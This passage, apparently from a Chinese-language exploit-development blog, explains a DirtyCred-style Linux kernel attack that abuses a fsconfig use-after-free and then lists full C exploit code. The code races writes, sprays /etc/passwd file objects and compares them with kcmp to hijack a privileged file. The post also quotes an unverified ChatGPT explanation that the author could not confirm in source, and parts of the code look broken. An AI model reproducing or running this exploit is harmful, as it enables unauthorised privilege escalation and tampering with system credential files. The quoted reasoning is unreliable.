		fdput_pos(f);
	}

	return ret;
}

c
/*
 * Generic write: first validates the file mode (FMODE_WRITE /
 * FMODE_CAN_WRITE), the user buffer and the target range, then dispatches to
 * the file's ->write() or ->write_iter() (via new_sync_write()).
 * Returns bytes written or a negative errno.
 */
ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
	ssize_t ret;

	/* Permission ("authorisation") checks on the struct file. */
	if (!(file->f_mode & FMODE_WRITE))
		return -EBADF;
	if (!(file->f_mode & FMODE_CAN_WRITE))
		return -EINVAL;
	if (unlikely(!access_ok(buf, count)))
		return -EFAULT;

	ret = rw_verify_area(WRITE, file, pos, count);
	if (ret)
		return ret;
	if (count > MAX_RW_COUNT)
		count =  MAX_RW_COUNT;
	file_start_write(file);
	/* Filesystem-specific write; no further f_mode check in this function. */
	if (file->f_op->write)
		ret = file->f_op->write(file, buf, count, pos);
	else if (file->f_op->write_iter)
		ret = new_sync_write(file, buf, count, pos);
	else
		ret = -EINVAL;
	if (ret > 0) {
		fsnotify_modify(file);
		add_wchar(current, ret);
	}
	inc_syscw(current);
	file_end_write(file);
	return ret;
}

对于上面的利用思路，由于Thread1和Thread2都打开了同一个文件，所以该文件的引用数至少为3；而使用open打开普通文件或目录时会自动设置f->f_mode |= FMODE_ATOMIC_POS

c
/*
 * Open helper (excerpt). The part shown sets FMODE_ATOMIC_POS on the new
 * struct file when the inode is a regular file or a directory, which is what
 * later makes __fdget_pos() consider f_pos_lock.
 */
static int do_dentry_open(struct file *f,
			  struct inode *inode,
			  int (*open)(struct inode *, struct file *))
{
	static const struct file_operations empty_fops = {};
	int error;

	...
	/* POSIX.1-2008/SUSv4 Section XSI 2.9.7 */
	if (S_ISREG(inode->i_mode) || S_ISDIR(inode->i_mode))
		f->f_mode |= FMODE_ATOMIC_POS;

	...
	return error;
}

这里给出的解决方法是如果打开的文件是一个软链接文件那么就不会设置FMODE_ATOMIC_POS标志但是我没有找到相关源码

ChatGPT给出的解释

这是由于 FMODE_ATOMIC_POS 标志位的含义。它的作用是用于表示文件位置相关操作是否是原子操作。也就是说，如果一个文件对象的 f_mode 字段有 FMODE_ATOMIC_POS 标志位被设置，那么对该文件对象进行位置相关操作时，内核会将其作为原子操作执行。

然而，软链接文件并没有实际的数据，它只是一个指向另一个文件或目录的符号链接。因此，它也没有实际的位置信息需要保护。在打开软链接文件时，内核会跟踪软链接所指向的目标文件，并在访问目标文件时执行相应的操作。因此，在打开软链接文件时，不需要将 FMODE_ATOMIC_POS 标志位设置到 struct file 结构体中。

总之，FMODE_ATOMIC_POS 标志位是专门用于表示一个文件对象是否支持原子操作的，而软链接文件本质上并没有数据需要保护，也没有位置信息需要保护，所以不需要使用 FMODE_ATOMIC_POS 标志位来表示软链接文件的特性。

总而言之如果方法奏效的话那么就可以尝试着开始编写EXP了

c
#define _GNU_SOURCE /* clone(), unshare() and the CLONE_NEW* flags */
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>

#include <linux/kcmp.h>
#include <linux/sched.h>

/*
 * fsconfig(2) syscall number (0x1AF == 431). Guarded so that a definition
 * already provided by the system headers is not redefined.
 */
#ifndef __NR_fsconfig
#define __NR_fsconfig 0x1AF
#endif
/* fsconfig() command whose value is an open file descriptor passed in aux. */
#ifndef FSCONFIG_SET_FD
#define FSCONFIG_SET_FD 0x5
#endif
/* Capacity of the fds[] array filled by SpriyFile(). */
#define MAX_SPRAY_FILE_NUM 0x1000

/* Real uid/gid of the caller, recorded by DoSandboxUsernameSpace(). */
size_t UID;
size_t GID;
/* Descriptor opened on ./uaf by Exploit() and written to by OverWrite(). */
int UAFfd;
/*
 * Hand-off flags that other threads busy-wait on. They are _Atomic so the
 * polling loops are well-defined and cannot be hoisted by the optimiser.
 */
_Atomic int WriteFlag;
_Atomic int SprayFlag;
int fds[MAX_SPRAY_FILE_NUM];

/* Stack for the clone()d child; its lowest page is turned into a guard page. */
__attribute__((aligned(64 << 10))) static char SandboxStack[1 << 20];

/*
 * Recreate the scratch directory test_dir (containing the empty files "data"
 * and "cgroup"), make it world-accessible and change into it.
 * Exits with status -1 if chmod() or chdir() fails.
 */
void MakeTestEnvir()
{
    static const char *const work_dir = "test_dir";

    system("rm -rf test_dir; mkdir test_dir; touch test_dir/data; touch test_dir/cgroup;");

    /* Short-circuit keeps the original order: chmod first, then chdir. */
    if (chmod(work_dir, 0777) != 0 || chdir(work_dir) != 0)
    {
        exit(-1);
    }
}

/*
 * Write a printf-style formatted string to an existing file.
 *
 * Defined before SandboxSetup() so that the call there sees a prototype.
 * The result is truncated to 1023 bytes. The file is opened write-only and
 * is not created if missing.
 *
 * Returns true when the whole string was written, false otherwise; errno
 * from the failing open()/write() is preserved across the close().
 */
bool WriteFile(const char *file, const char *what, ...)
{
    char buf[1024];
    va_list args;

    va_start(args, what);
    vsnprintf(buf, sizeof(buf), what, args);
    va_end(args);
    buf[sizeof(buf) - 1] = 0;

    size_t len = strlen(buf);
    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;

    if (write(fd, buf, len) != (ssize_t)len)
    {
        int err = errno;
        close(fd);
        errno = err;
        return false;
    }
    close(fd);
    return true;
}

/*
 * Prepare the child process: die with the parent, start a new session, apply
 * resource limits, unshare namespaces and write a set of SysV IPC sysctls.
 * Every step is best-effort; failures are deliberately ignored.
 */
void SandboxSetup()
{
    static const struct
    {
        int resource;
        rlim_t limit;
    } limits[] = {
        {RLIMIT_AS, 200 << 20},
        {RLIMIT_MEMLOCK, 32 << 20},
        {RLIMIT_FSIZE, 136 << 20},
        {RLIMIT_STACK, 1 << 20},
        {RLIMIT_CORE, 0},
        {RLIMIT_NOFILE, 256},
    };
    typedef struct
    {
        const char *name;
        const char *value;
    } sysctl_t;
    static const sysctl_t sysctls[] = {
        {"/proc/sys/kernel/shmmax", "16777216"},
        {"/proc/sys/kernel/shmall", "536870912"},
        {"/proc/sys/kernel/shmmni", "1024"},
        {"/proc/sys/kernel/msgmax", "8192"},
        {"/proc/sys/kernel/msgmni", "1024"},
        {"/proc/sys/kernel/msgmnb", "1024"},
        {"/proc/sys/kernel/sem", "1024 1048576 500 1024"},
    };
    unsigned i;

    prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
    setsid();

    for (i = 0; i < sizeof(limits) / sizeof(limits[0]); i++)
    {
        struct rlimit rlim;
        rlim.rlim_cur = rlim.rlim_max = limits[i].limit;
        setrlimit(limits[i].resource, &rlim);
    }

    /* Namespace isolation; each call may fail without aborting the setup. */
    if (unshare(CLONE_NEWNS))
    {
    }
    if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL))
    {
    }
    if (unshare(CLONE_NEWIPC))
    {
    }
    if (unshare(0x02000000)) /* CLONE_NEWCGROUP */
    {
    }
    if (unshare(CLONE_NEWUTS))
    {
    }
    if (unshare(CLONE_SYSVSEM))
    {
    }

    for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++)
    {
        /* Pass the value as data, never as the format string itself. */
        WriteFile(sysctls[i].name, "%s", sysctls[i].value);
    }
}

void SlowWrite()
{
    printf("Staring SlowWrite...\n");
    int fd = open("./uaf", O_WRONLY);
    int offset;
    void *mem;
    struct iovec iov[5];

    if (fd < 0)
    {
        perror("SlowWrite open uaf");
        exit(2);
    }

    for (offset = 0; offset < 0x80000; offset++)
    {
        void *r = mmap((void *)(0x30000000 + 0x1000 * offset), 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
        if (r < 0)
        {
            perror("mmap error");
            exit(-2);
        }
    }

    WriteFlag = 1;
    mem = (void *)0x30000000;
    for (int i = 0; i < 5; i++)
    {
        iov[i].iov_base = mem;
        iov[i].iov_len = (offset - 1) * 0x1000;
    }

    printf("SlowWrite Finished !\n");
}

void OverWrite()
{
    printf("Staring OverWrite...\n");
    char data[0x1000] = {"\nDirtyCred is Working \n\n"};
    struct iovec iov;
    iov.iov_base = data;
    iov.iov_len = strlen(data);
    while (!WriteFlag)
    {
    }
    SprayFlag = 1;
    if (writev(UAFfd, &iov, 1) < 0)
    {
        printf("Error to write\n");
    }
    printf("OverWrite Finished!\n");
}

void SpriyFile()
{
    int found;
    while (!SprayFlag)
    {
    }
    printf("UAF File's fd is %d, Start spriy", UAFfd);

    for (int i = 0; i < MAX_SPRAY_FILE_NUM; i++)
    {
        fds[i] = open("/etc/passwd", O_RDONLY);
        if (fds[i] < 0)
        {
            perror("open passwd");
        }
        if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, UAFfd, fds[i]) == 0)
        {
            found=1;
            printf("Hacked success, File id is %d", fds[i]);
            for (int j = 0; j<i; j++)
            {
                close(fds[j]);
            }
            break;
        }
    }

    if (found == 1)
    {
        printf("HackWrite success");
        exit(0);
    }
    printf("Failed");
    exit(-1);
    
}

void Exploit()
{
    int FSfd = open("cgroup", O_RDONLY);
    if (FSfd < 0)
    {
        perror("open cgroup");
        exit(1);
    }
    symlink("./data", "./uaf");

    UAFfd = open("./uaf", O_WRONLY);
    if (UAFfd < 0)
    {
        perror("open uaf");
        exit(1);
    }

    if (syscall(__NR_fsconfig, FSfd, 5, "source", 0, UAFfd))
    {
        perror("fsconfig");
        exit(1);
    }
    close(FSfd);

    pthread_t Thread2;
    pthread_create(&Thread2, NULL, SlowWrite, NULL);
    pthread_t Thread3;
    pthread_create(&Thread3, NULL, OverWrite, NULL);
}

/*
 * Entry point of the clone()d child; the signature is the one clone()
 * requires. Runs SandboxSetup() and then Exploit().
 *
 * Success is only ever reported through exit(0) elsewhere, so reaching the
 * end of this function is reported as failure (status 1) instead of an
 * indeterminate value.
 */
int StartExploit(void *arg)
{
    (void)arg;
    SandboxSetup();
    Exploit();
    return 1;
}

/*
 * Wait for child @pid and return its exit status.
 * Exits with -1 if @pid is negative (clone() failed). Returns -1 if waitpid()
 * fails for a reason other than EINTR, or if the child did not exit normally.
 */
int WaitStatus(int pid)
{
    if (pid < 0)
    {
        exit(-1);
    }

    int Status = 0;
    for (;;)
    {
        int reaped = waitpid(-1, &Status, __WALL);
        if (reaped == pid)
        {
            break;
        }
        if (reaped < 0 && errno != EINTR)
        {
            /* e.g. ECHILD: nothing left to wait for; do not spin forever */
            return -1;
        }
    }

    /* WEXITSTATUS is only meaningful for a normal exit. */
    return WIFEXITED(Status) ? WEXITSTATUS(Status) : -1;
}

/*
 * Record the caller's uid/gid, turn the lowest page of SandboxStack into a
 * guard page, then repeatedly clone() a child in new user and PID namespaces
 * running StartExploit() until a child exits with status 0.
 */
void DoSandboxUsernameSpace()
{
    UID = getuid();
    GID = getgid();
    mprotect(SandboxStack, 0x1000, PROT_NONE);

    while (1)
    {
        int pid = clone(StartExploit, &SandboxStack[sizeof(SandboxStack) - 64],
                        CLONE_NEWUSER | CLONE_NEWPID, NULL);
        int ReturnStatus = WaitStatus(pid);
        if (ReturnStatus == 0)
        {
            printf("Success \n");
            return; /* void function: the original `return 1` was invalid */
        }
        else
        {
            printf("Return \n");
        }
    }
}

/*
 * Program entry: build the scratch directory, issue three raw mmap syscalls
 * at fixed addresses (a 16 MiB region with protection 7 between two
 * single-page regions with protection 0), then hand over to
 * DoSandboxUsernameSpace().
 */
int main(void)
{
    static const struct
    {
        unsigned long addr;
        unsigned long len;
        unsigned long prot;
    } regions[] = {
        {0x1ffff000ul, 0x1000ul, 0ul},
        {0x20000000ul, 0x1000000ul, 7ul},
        {0x21000000ul, 0x1000ul, 0ul},
    };

    MakeTestEnvir();

    for (unsigned idx = 0; idx < sizeof(regions) / sizeof(regions[0]); idx++)
    {
        syscall(__NR_mmap, regions[idx].addr, regions[idx].len, regions[idx].prot, 0x32ul, -1, 0ul);
    }

    DoSandboxUsernameSpace();
    return 0;
}